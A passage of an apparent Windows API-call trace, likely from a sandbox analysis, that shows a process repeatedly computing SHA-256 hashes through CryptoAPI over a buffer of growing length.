	[0187.460] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.460] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.460] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.460] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0187.460] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f940
	[0187.460] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f940, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f940, pdwDataLen=0x128aac) returned 1
	[0187.460] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.460] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.460] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.461] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.461] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0187.461] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f968
	[0187.461] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f968, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f968, pdwDataLen=0x128aac) returned 1
	[0187.461] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.461] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.461] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.461] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.461] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0187.461] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f990
	[0187.461] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f990, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f990, pdwDataLen=0x128aac) returned 1
	[0187.461] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.461] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.461] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.462] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.462] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0187.462] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f9b8
	[0187.462] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f9b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f9b8, pdwDataLen=0x128aac) returned 1
	[0187.462] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.462] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.462] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.462] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.462] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0187.462] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f9e0
	[0187.462] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f9e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f9e0, pdwDataLen=0x128aac) returned 1
	[0187.462] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.462] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.462] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.463] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.463] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0187.463] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fa08
	[0187.463] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fa08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fa08, pdwDataLen=0x128aac) returned 1
	[0187.463] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.463] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.463] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.463] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.463] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0187.463] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fa30
	[0187.463] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fa30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fa30, pdwDataLen=0x128aac) returned 1
	[0187.463] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.463] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.463] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.464] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.464] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0187.464] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fa58
	[0187.464] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fa58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fa58, pdwDataLen=0x128aac) returned 1
	[0187.464] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.464] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.464] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.464] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.464] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0187.464] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fa80
	[0187.464] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fa80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fa80, pdwDataLen=0x128aac) returned 1
	[0187.464] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.464] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.464] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.465] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.465] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0187.465] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272faa8
	[0187.465] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272faa8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272faa8, pdwDataLen=0x128aac) returned 1
	[0187.465] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.465] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.465] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.465] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.465] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0187.465] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fad0
	[0187.465] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fad0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fad0, pdwDataLen=0x128aac) returned 1
	[0187.465] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.465] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.465] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.466] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.466] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0187.466] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272faf8
	[0187.466] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272faf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272faf8, pdwDataLen=0x128aac) returned 1
	[0187.466] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.466] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.466] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.467] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.467] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0187.467] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fb20
	[0187.467] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fb20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fb20, pdwDataLen=0x128aac) returned 1
	[0187.467] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.467] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.467] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.467] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.467] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0187.467] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fb48
	[0187.467] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fb48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fb48, pdwDataLen=0x128aac) returned 1
	[0187.467] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.467] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.467] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.468] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.468] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0187.468] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fb70
	[0187.468] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fb70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fb70, pdwDataLen=0x128aac) returned 1
	[0187.468] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.468] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.468] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.468] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.468] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0187.468] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fb98
	[0187.468] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fb98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fb98, pdwDataLen=0x128aac) returned 1
	[0187.468] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.468] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.468] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.469] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.469] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0187.469] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fbc0
	[0187.469] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fbc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fbc0, pdwDataLen=0x128aac) returned 1
	[0187.469] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.469] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.469] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.469] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.469] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0187.469] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fbe8
	[0187.469] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fbe8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fbe8, pdwDataLen=0x128aac) returned 1
	[0187.469] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.469] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.469] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.470] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.470] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0187.470] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fc10
	[0187.470] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fc10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fc10, pdwDataLen=0x128aac) returned 1
	[0187.470] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.470] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.470] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.470] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.470] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0187.470] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fc38
	[0187.470] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fc38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fc38, pdwDataLen=0x128aac) returned 1
	[0187.470] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.470] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.470] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.471] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.471] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0187.471] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fc60
	[0187.471] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fc60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fc60, pdwDataLen=0x128aac) returned 1
	[0187.471] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.471] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.471] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.471] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.471] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0187.471] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fc88
	[0187.471] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fc88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fc88, pdwDataLen=0x128aac) returned 1
	[0187.471] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.471] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.471] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.472] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.472] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0187.472] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fcb0
	[0187.472] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fcb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fcb0, pdwDataLen=0x128aac) returned 1
	[0187.472] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.472] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.472] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.472] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.472] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0187.472] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fcd8
	[0187.472] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fcd8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fcd8, pdwDataLen=0x128aac) returned 1
	[0187.472] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.473] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.473] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.473] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.473] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0187.473] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.473] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fd00
	[0187.473] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fd00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fd00, pdwDataLen=0x128aac) returned 1
	[0187.473] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.473] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
